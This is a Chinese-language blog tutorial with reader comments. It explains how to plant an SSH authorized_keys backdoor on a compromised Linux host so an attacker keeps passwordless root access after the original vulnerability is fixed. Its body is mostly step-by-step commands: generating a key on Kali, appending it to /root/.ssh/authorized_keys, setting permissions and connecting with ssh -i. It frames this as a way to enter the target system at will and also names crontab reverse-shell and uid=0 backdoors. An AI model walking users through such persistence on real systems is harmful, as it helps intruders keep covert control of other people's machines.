至少我们曾经在一起过。
来自:一言
前言
相信大家在做渗透测试的时候,会遇到后渗透阶段的权限维持问题,常见的linux后门有crontab后门(在计划任务里添加反弹shell任务),超级用户后门(也就是uid=0的用户),ssh免密登录后门等等等~~~[aru_5],当然你有能力的话,可以试试破解root密码~~这里我就详细的教大家如何利用ssh后门和计划任务后门(下次讲,这次懒得写了~)进行权限维持。(以下内容适合小白观看,大佬勿喷[aru_3])
情景模拟
让我们假设一下,你已经通过目标主机的漏洞成功拿到了shell[aru_36],但是可能这个漏洞不知道什么时候就会被管理员修复,你也不知道root权限的密码,那咋办嘛?[aru_61]哭?[aru_15]寻找新的漏洞?[aru_19],当然不用这么麻烦,所以我们需要给目标主机留个后门,方便自己随时日进对方系统~
环境如下:
攻击机(本机):kali ip: 1.1.2.3
目标机:ubuntu ip: 1.1.2.5
ssh免密登录后门
ssh免密登录就是在自己的攻击机上生成一个密钥,然后把他放进目标主机的ssh密钥存放文件里(个人理解~),然后攻击机就可以拿着这个密钥直接连接目标主机了,不需要密码,当然后门嘛,还是会有被发现的风险的~
1.在kali(自己的服务器)上生成密钥
ssh-keygen -b 4096 -t rsa #直接三个回车搞定
2.查看一下生成的密钥
3.将密钥里的内容全部复制,注意是全部!然后复制到目标服务端的authorized_keys
中,命令如下
echo "你自己的密钥内容">>/root/.ssh/authorized_keys #两个>>表示追加在文件后面 chmod 600 ~/.ssh/authorized_keys #编辑完成后还得修改权限 chmod 700 ~/.ssh
详细操作可看下图:
4.在攻击机上使用免密登录测试
ssh -i /root/.ssh/id_rsa root@目标ip
测试截图如下:
可以看到不用密码就直接进入了目标服务器,好了时间也不早了,今天的教程到这里就结束了,下次再分享crontab计划任务后门。[aru_33]
有趣提示:后门还是有被发现的风险哦。
本文作者为TRY,转载请注明。
学到了
确实学到了技术
你觉得你不知道root权限的密码,你能编辑/root下的文件吗?[aru_3]
@非专业运维兄弟,知道什么叫后门吗?看到你这个评论,我笑出了声。
@非专业运维留后门都是权限维持这一步了你没root权限你维持啥啊
我按照你这个步骤一步一步操作的,都没问题,但是在本机上操作 ssh -i哪一步输入对方的 root@IP地址 还是提示我要输入密码的,直接过不去啊!
@奇可能是权限问题呢。
@TRY有一个问题就是 echo 那一步是在本机输入这三条命令 还是在被攻击那台机器上输入这三条命令呢?要是在被攻击机器上输入的话,我都不知道密码,我怎么进行输入呢?我比较疑惑。
还是前提之下我早早已经连接他的机器呢 然后我在他机器上留个后门,直接就可以在我机器上登录对方机器是吧?